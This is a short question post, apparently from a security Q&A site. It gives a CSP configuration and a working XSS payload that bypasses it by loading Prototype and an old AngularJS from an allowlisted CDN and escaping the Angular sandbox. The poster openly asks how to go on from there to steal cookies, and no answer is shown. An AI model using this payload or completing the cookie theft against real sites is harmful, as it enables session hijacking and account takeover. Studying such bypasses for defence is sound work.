• caglararli@hotmail.com
  • 05386281520

Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation

Çağlar Arlı      -    27 Views

Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation

I have a website that includes CSP rules:

 .use(
   helmet.contentSecurityPolicy({
    directives: {
    defaultSrc: ["'self'"],
    scriptSrc: [
      "'self'",
      "cdnjs.cloudflare.com"
    ],
  },
})
)

I successfully executed an XSS attack in a input field and bypassed the CSP by:

<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" />. 
</SCRIPT>
<div ng-app ng-csp style="display:none;">
  {{$on.curry.call().alert('xss')}}
</div>

However, when attempting to steal the cookie, I encountered an issue. I tried to access the cookie using document.cookie, but it didn't work as expected. Instead, I received 'undefined' when attempting to simply alert 'document'. How can I successfully steal the cookie in this scenario?"

I tried: {{$on.curry.call().alert(document.cookie)}}

but did not work. How can I successfully steal the cookie in this scenario?